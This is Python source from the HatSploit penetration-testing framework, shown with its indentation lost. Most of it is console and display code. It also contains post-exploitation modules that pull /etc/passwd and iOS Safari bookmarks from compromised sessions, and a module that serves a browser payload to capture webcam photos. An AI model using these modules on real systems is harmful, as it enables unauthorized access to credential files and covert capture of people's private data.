class HatSploitModule(Module, Sessions):
details = {
'Category': "post",
'Name': "Unix Obtain /etc/passwd",
'Module': "post/unix/shell/getpasswd",
'Authors': ['Ivan Nikolsky (enty8080) - module developer'],
'Description': "Get current session /etc/passwd file.",
'Platform': "unix",
'Rank': "medium"
}
options = {
'SESSION': {
'Description': "Session to run on.",
'Value': None,
'Type': "session->[unix,linux,macos,apple_ios]",
'Required': True
},
'PATH': {
'Description': "Path to save file.",
'Value': Loot().specific_loot('passwd'),
'Type': None,
'Required': True
}
}
def run(self):
session, path = self.parse_options(self.options)
self.session_download(session, '/etc/passwd', path)
class HatSploitCommand(Command):
loot = Loot()
show = Show()
details = {
'Category': "loot",
'Name': "loot",
'Authors': ['Ivan Nikolsky (enty8080) - command developer'],
'Description': "Manage collected loot.",
'Usage': "loot <option> [arguments]",
'MinArgs': 1,
'Options': {
'-l': ['', "List all collected loot."],
'-r': ['<name>', "Remove collected loot."]
}
}
def run(self, argc, argv):
choice = argv[1]
if choice == '-l':
self.show.show_loot()
elif choice == '-r':
self.loot.remove_loot(argv[2])
class HatSploitModule(Module, Sessions, DBTools):
details = {
'Category': "post",
'Name': "Obtain Safari bookmarks",
'Module': "post/apple_ios/shell/safari_bookmarks",
'Authors': ['Ivan Nikolsky (enty8080) - module developer'],
'Description': "Get iOS Safari bookmarks database and parse it.",
'Platform': "apple_ios",
'Rank': "medium"
}
options = {
'SESSION': {
'Description': "Session to run on.",
'Value': None,
'Type': "session",
'Required': True
},
'PATH': {
'Description': "Path to save file.",
'Value': Loot().specific_loot('Bookmarks.db'),
'Type': None,
'Required': True
}
}
def run(self):
session, path = self.parse_options(self.options)
bookmarks = '/private/var/mobile/Library/Safari/Bookmarks.db'
path = self.session_download(session, bookmarks, path)
if path:
self.print_process("Parsing bookmarks database...")
try:
bookmarks = self.parse_safari_bookmarks(path)
except Exception:
self.print_error("Failed to parse bookmarks database!")
return
bookmarks_data = []
for item in bookmarks:
bookmarks_data.append((item['title'], item['url']))
if bookmarks_data:
self.print_table("Bookmarks", ('Title', 'URL'),
*bookmarks_data)
else:
self.print_warning("No bookmarks available on device.")
class Console:
exceptions = Exceptions()
execute = Execute()
loader = Loader()
fmt = FMT()
badges = Badges()
completer = Completer()
banner = Banner()
tip = Tip()
loot = Loot()
config = Config()
jobs = Jobs()
options = Options()
sessions = Sessions()
modules = Modules()
payloads = Payloads()
local_storage = LocalStorage()
history = config.path_config['history_path']
prompt = config.core_config['details']['prompt']
handler_options = {
'Module': {},
'Payload': {}
}
completion = None
def check_install(self):
if os.path.exists(self.config.path_config['root_path']):
workspace = self.config.path_config['user_path']
loot = self.config.path_config['loot_path']
if not os.path.isdir(workspace):
self.badges.print_process(f"Creating workspace at {workspace}...")
os.mkdir(workspace)
if not os.path.isdir(loot):
self.loot.create_loot()
return True
self.badges.print_error("HatSploit is not installed!")
self.badges.print_information("Consider running installation.")
return False
def start_hsf(self):
try:
self.loader.load_all()
except Exception:
sys.exit(1)
def update_events(self):
current_module = self.modules.get_current_module_object()
current_payload = self.payloads.get_current_payload()
self.jobs.stop_dead()
self.sessions.close_dead()
self.options.add_handler_options(current_module, current_payload)
def launch_menu(self):
while True:
try:
if not self.modules.check_current_module():
prompt = f'({self.prompt})> '
else:
current_module = self.modules.get_current_module_object()
category = current_module.details['Category']
name = current_module.details['Name']
prompt = f'({self.prompt}: {category}: %red{name}%end)> '
commands = self.badges.input_empty(prompt)
self.update_events()
self.execute.execute_command(commands)
self.update_events()
if self.local_storage.get("history"):
readline.write_history_file(self.history)
except (KeyboardInterrupt, EOFError, self.exceptions.GlobalException):
pass
except Exception as e:
self.badges.print_error(f"An error occurred: {str(e)}!")
def enable_history_file(self):
if not os.path.exists(self.history):
open(self.history, 'w').close()
readline.read_history_file(self.history)
def launch_history(self):
readline.set_auto_history(False)
using_history = self.local_storage.get("history")
if using_history:
readline.set_auto_history(True)
self.enable_history_file()
readline.set_completer(self.completer.completer)
readline.set_completer_delims(" \t\n;")
readline.parse_and_bind("tab: complete")
def launch_shell(self):
version = self.config.core_config['details']['version']
codename = self.config.core_config['details']['codename']
if self.config.core_config['console']['clear']:
self.badges.print_empty("%clear", end='')
if self.config.core_config['console']['banner']:
self.banner.print_random_banner()
if self.config.core_config['console']['header']:
plugins = self.local_storage.get("plugins")
modules = self.local_storage.get("modules")
payloads = self.local_storage.get("payloads")
plugins_total = 0
modules_total = 0
payloads_total = 0
if payloads:
for database in payloads:
payloads_total += len(payloads[database])
if plugins:
for database in plugins:
plugins_total += len(plugins[database])
if modules:
for database in modules:
modules_total += len(modules[database])
header = ""
header += "%end"
if codename:
header += f" --=( %yellowHatSploit Framework {version} {codename}%end\n"
else:
header += f" --=( %yellowHatSploit Framework {version}%end\n"
header += "--==--=( Developed by EntySec (%linehttps://entysec.netlify.app/%end)\n"
header += f" --=( {modules_total} modules | {payloads_total} payloads | {plugins_total} plugins"
header += "%end"
self.badges.print_empty(header)
if self.config.core_config['console']['tip']:
self.tip.print_random_tip()
def shell(self):
self.start_hsf()
self.launch_history()
self.launch_shell()
self.launch_menu()
def script(self, input_files, do_shell=False):
self.start_hsf()
self.launch_shell()
for input_file in input_files:
if os.path.exists(input_file):
file = open(input_file, 'r')
file_text = file.read().split('\n')
file.close()
for line in file_text:
commands = self.fmt.format_commands(line)
self.add_handler_options()
self.jobs.stop_dead()
self.execute.execute_command(commands)
if do_shell:
self.launch_history()
self.launch_menu()
class HatSploitModule(Module, Handle, StringTools):
loot = Loot()
details = {
'Category': "exploit",
'Name': "Gather Browser Webcam Photo",
'Module': "exploit/generic/gather/browser_webcam_photo",
'Authors': ['Ivan Nikolsky (enty8080) - module developer'],
'Description': "Module takes photo through browser.",
'Platform': "generic",
'Rank': "high"
}
options = {
'SRVHOST': {
'Description': "Host to start http server on.",
'Value': "0.0.0.0",
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Port to start http server on.",
'Value': 8080,
'Type': "port",
'Required': True
},
'PATH': {
'Description': "Path to save file.",
'Value': loot.random_loot('png'),
'Type': None,
'Required': True
},
'URLPATH': {
'Description': "File path on server.",
'Value': "/",
'Type': None,
'Required': True
}
}
def run(self):
server_host, server_port, path, url_path = self.parse_options(
self.options)
def get(request):
if request.path == url_path:
payload = self.loot.get_data('webcam/index.html')
self.print_process("Delivering payload...")
request.send_status(200)
request.wfile.write(payload)
def post(request):
self.print_process("Taking webcam photo...")
request.send_status(200)
try:
photo_length = int(request.headers['Content-Length'])
post_data = request.rfile.read(photo_length)
post_data = post_data.split(b',', 1)[1]
photo_data = self.base64_decode(post_data, False)
except Exception:
self.print_error("Failed to take photo!")
return
self.loot.save_file(path, photo_data, 'png')
self.listen_server(server_host, server_port, {
'GET': get,
'POST': post
})
class Show:
jobs = Jobs()
loot = Loot()
local_storage = LocalStorage()
modules = Modules()
payloads = Payloads()
sessions = Sessions()
colors = Colors()
badges = Badges()
tables = Tables()
def show_custom_commands(self, handler):
commands_data = {}
headers = ("Command", "Description")
commands = handler
for command in sorted(commands):
label = commands[command].details['Category']
commands_data[label] = []
for command in sorted(commands):
label = commands[command].details['Category']
commands_data[label].append(
(command, commands[command].details['Description']))
for label in sorted(commands_data):
self.tables.print_table(label.title() + " Commands", headers,
*commands_data[label])
def show_interface_commands(self):
if self.local_storage.get("commands"):
self.show_custom_commands(self.local_storage.get("commands"))
else:
self.badges.print_warning("No commands available.")
def show_plugin_commands(self):
for plugin in self.local_storage.get("loaded_plugins"):
loaded_plugin = self.local_storage.get("loaded_plugins")[plugin]
if hasattr(loaded_plugin, "commands"):
commands_data = {}
headers = ("Command", "Description")
commands = loaded_plugin.commands
for label in sorted(commands):
commands_data[label] = []
for command in sorted(commands[label]):
commands_data[label].append(
(command, commands[label][command]['Description']))
for label in sorted(commands_data):
self.tables.print_table(label.title() + " Commands",
headers, *commands_data[label])
def show_module_commands(self):
current_module = self.modules.get_current_module_object()
if hasattr(current_module, "commands"):
commands_data = []
headers = ("Command", "Description")
commands = current_module.commands
for command in sorted(commands):
commands_data.append(
(command, commands[command]['Description']))
self.tables.print_table("Module Commands", headers, *commands_data)
def show_all_commands(self):
self.show_interface_commands()
if self.modules.check_current_module():
self.show_module_commands()
if self.local_storage.get("loaded_plugins"):
self.show_plugin_commands()
def show_jobs(self):
if self.local_storage.get("jobs"):
jobs_data = []
headers = ("ID", "Name", "Module")
jobs = self.local_storage.get("jobs")
for job_id in jobs:
jobs_data.append((job_id, jobs[job_id]['job_name'],
jobs[job_id]['module_name']))
self.tables.print_table("Active Jobs", headers, *jobs_data)
else:
self.badges.print_warning("No running jobs available.")
def show_loot(self):
loots = self.loot.list_loot()
if loots:
headers = ("Loot", "Path", "Time")
self.tables.print_table("Collected Loot", headers, *loots)
else:
self.badges.print_warning("No loot collected yet.")
def show_module_databases(self):
if self.local_storage.get("connected_module_databases"):
databases_data = []
number = 0
headers = ("Number", "Name", "Path")
databases = self.local_storage.get("connected_module_databases")
for name in databases:
databases_data.append((number, name, databases[name]['path']))
number += 1
self.tables.print_table("Connected Module Databases", headers,
*databases_data)
else:
self.badges.print_warning("No module database connected.")
def show_payload_databases(self):
if self.local_storage.get("connected_payload_databases"):
databases_data = []
number = 0
headers = ("Number", "Name", "Path")
databases = self.local_storage.get("connected_payload_databases")
for name in databases:
databases_data.append((number, name, databases[name]['path']))
number += 1
self.tables.print_table("Connected Payload Databases", headers,
*databases_data)
else:
self.badges.print_warning("No payload database connected.")
def show_plugin_databases(self):
if self.local_storage.get("connected_plugin_databases"):
databases_data = []
number = 0
headers = ("Number", "Name", "Path")
databases = self.local_storage.get("connected_plugin_databases")
for name in databases:
databases_data.append((number, name, databases[name]['path']))
number += 1
self.tables.print_table("Connected Plugin Databases", headers,
*databases_data)
else:
self.badges.print_warning("No plugin database connected.")
def show_plugins(self):
all_plugins = self.local_storage.get("plugins")
headers = ("Number", "Plugin", "Name")
plugins_shorts = {}
for database in sorted(all_plugins):
number = 0
plugins_data = []
plugins = all_plugins[database]
for plugin in sorted(plugins):
plugins_data.append((number, plugins[plugin]['Plugin'],
plugins[plugin]['Name']))
plugins_shorts.update({number: plugins[plugin]['Plugin']})
number += 1
self.tables.print_table(f"Plugins ({database})", headers,
*plugins_data)
self.local_storage.set("plugin_shorts", plugins_shorts)
def show_modules(self, category=None):
all_modules = self.local_storage.get("modules")
headers = ("Number", "Category", "Module", "Rank", "Name")
modules_shorts = {}
for database in sorted(all_modules):
number = 0
modules_data = []
modules = all_modules[database]
for module in sorted(modules):
if category:
if category == modules[module]['Category']:
modules_data.append(
(number, modules[module]['Category'],
modules[module]['Module'],
modules[module]['Rank'], modules[module]['Name']))
modules_shorts.update(
{number: modules[module]['Module']})
number += 1
else:
modules_data.append(
(number, modules[module]['Category'],
modules[module]['Module'], modules[module]['Rank'],
modules[module]['Name']))
modules_shorts.update({number: modules[module]['Module']})
number += 1
if category:
self.tables.print_table(
f"{category.title()} Modules ({database})", headers,
*modules_data)
else:
self.tables.print_table(f"Modules ({database})", headers,
*modules_data)
self.local_storage.set("module_shorts", modules_shorts)
def show_payloads(self, category=None):
all_payloads = self.local_storage.get("payloads")
headers = ("Number", "Category", "Payload", "Rank", "Name")
payloads_shorts = {}
for database in sorted(all_payloads):
number = 0
payloads_data = []
payloads = all_payloads[database]
for payload in sorted(payloads):
if category:
if category == payloads[payload]['Category']:
payloads_data.append(
(number, payloads[payload]['Category'],
payloads[payload]['Payload'],
payloads[payload]['Rank'],
payloads[payload]['Name']))
payloads_shorts.update(
{number: payloads[payload]['Payload']})
number += 1
else:
payloads_data.append(
(number, payloads[payload]['Category'],
payloads[payload]['Payload'],
payloads[payload]['Rank'], payloads[payload]['Name']))
payloads_shorts.update(
{number: payloads[payload]['Payload']})
number += 1
if category:
self.tables.print_table(
f"{category.title()} Payloads ({database})", headers,
*payloads_data)
else:
self.tables.print_table(f"Payloads ({database})", headers,
*payloads_data)
self.local_storage.set("payload_shorts", payloads_shorts)
def show_search_plugins(self, keyword):
all_plugins = self.local_storage.get("plugins")
plugins_shorts = {}
if all_plugins:
headers = ("Number", "Plugin", "Name")
for database in all_plugins:
number = 0
plugins_data = []
plugins = all_plugins[database]
for plugin in sorted(plugins):
if keyword in plugins[plugin][
'Plugin'] or keyword in plugins[plugin]['Name']:
name = plugins[plugin]['Plugin'].replace(
keyword,
self.colors.RED + keyword + self.colors.END)
description = plugins[plugin]['Name'].replace(
keyword,
self.colors.RED + keyword + self.colors.END)
plugins_data.append((number, name, description))
plugins_shorts.update(
{number: plugins[plugin]['Plugin']})
number += 1
if plugins_data:
self.tables.print_table(f"Plugins ({database})", headers,
*plugins_data)
self.local_storage.set("plugin_shorts", plugins_shorts)
def show_search_modules(self, keyword):
all_modules = self.local_storage.get("modules")
modules_shorts = {}
if all_modules:
headers = ("Number", "Module", "Rank", "Name")
for database in all_modules:
number = 0
modules_data = []
modules = all_modules[database]
for module in sorted(modules):
if keyword in modules[module][
'Module'] or keyword in modules[module]['Name']:
name = modules[module]['Module'].replace(
keyword,
self.colors.RED + keyword + self.colors.END)
description = modules[module]['Name'].replace(
keyword,
self.colors.RED + keyword + self.colors.END)
modules_data.append(
(number, name, modules[module]['Rank'],
description))
modules_shorts.update(
{number: modules[module]['Module']})
number += 1
if modules_data:
self.tables.print_table(f"Modules ({database})", headers,
*modules_data)
self.local_storage.set("module_shorts", modules_shorts)
def show_search_payloads(self, keyword):
all_payloads = self.local_storage.get("payloads")
payloads_shorts = {}
if all_payloads:
headers = ("Number", "Category", "Payload", "Rank", "Name")
for database in all_payloads:
number = 0
payloads_data = []
payloads = all_payloads[database]
for payload in sorted(payloads):
if keyword in payloads[payload][
'Payload'] or keyword in payloads[payload]['Name']:
name = payloads[payload]['Payload'].replace(
keyword,
self.colors.RED + keyword + self.colors.END)
description = payloads[payload]['Name'].replace(
keyword,
self.colors.RED + keyword + self.colors.END)
payloads_data.append(
(number, payloads[payload]['Category'], name,
payloads[payload]['Rank'], description))
payloads_shorts.update(
{number: payloads[payload]['Payload']})
number += 1
if payloads_data:
self.tables.print_table(f"Payloads ({database})", headers,
*payloads_data)
self.local_storage.set("payload_shorts", payloads_shorts)
def show_sessions(self):
sessions = self.local_storage.get("sessions")
if sessions:
sessions_data = []
headers = ("ID", "Platform", "Architecture", "Type", "Host",
"Port")
for session_id in sessions:
session_platform = sessions[session_id]['platform']
session_architecture = sessions[session_id]['architecture']
session_type = sessions[session_id]['type']
host = sessions[session_id]['host']
port = sessions[session_id]['port']
sessions_data.append(
(session_id, session_platform, session_architecture,
session_type, host, port))
self.tables.print_table("Opened Sessions", headers, *sessions_data)
else:
self.badges.print_warning("No opened sessions available.")
def show_module_information(self, current_module_details):
current_module = current_module_details
authors = ""
for author in current_module['Authors']:
authors += author + ", "
authors = authors[:-2]
self.badges.print_information("Module information:")
self.badges.print_empty("")
if current_module['Name']:
self.badges.print_empty(" Name: " + current_module['Name'])
if current_module['Module']:
self.badges.print_empty(" Module: " +
current_module['Module'])
if authors:
self.badges.print_empty(" Authors: ")
for author in current_module['Authors']:
self.badges.print_empty(" " + author)
if current_module['Description']:
self.badges.print_empty(" Description: " +
current_module['Description'])
if current_module['Rank']:
self.badges.print_empty(" Rank: " + current_module['Rank'])
self.badges.print_empty("")
def show_options(self):
current_module = self.modules.get_current_module_object()
if not current_module:
self.badges.print_warning("No module selected.")
return
if not hasattr(current_module, "options") and not hasattr(
current_module, "payload"):
self.badges.print_warning("Module has no options.")
return
if not hasattr(current_module, "options") and not hasattr(
self.payloads.get_current_payload(), "options"):
self.badges.print_warning("Module has no options.")
return
if hasattr(current_module, "options"):
options_data = []
headers = ("Option", "Value", "Required", "Description")
options = current_module.options
for option in sorted(options):
value, required = options[option]['Value'], options[option][
'Required']
if required:
required = "yes"
else:
required = "no"
if not value and value != 0:
value = ""
options_data.append(
(option, value, required, options[option]['Description']))
self.tables.print_table(
f"Module Options ({current_module.details['Module']})",
headers, *options_data)
if hasattr(current_module, "payload"):
if hasattr(self.payloads.get_current_payload(), "options"):
options_data = []
headers = ("Option", "Value", "Required", "Description")
current_payload = self.payloads.get_current_payload()
if current_payload:
for option in sorted(current_payload.options):
value, required = current_payload.options[option]['Value'], \
current_payload.options[option]['Required']
if required:
required = "yes"
else:
required = "no"
if not value and value != 0:
value = ""
options_data.append(
(option, value, required,
current_payload.options[option]['Description']))
self.tables.print_table(
f"Payload Options ({current_payload.details['Payload']})",
headers, *options_data)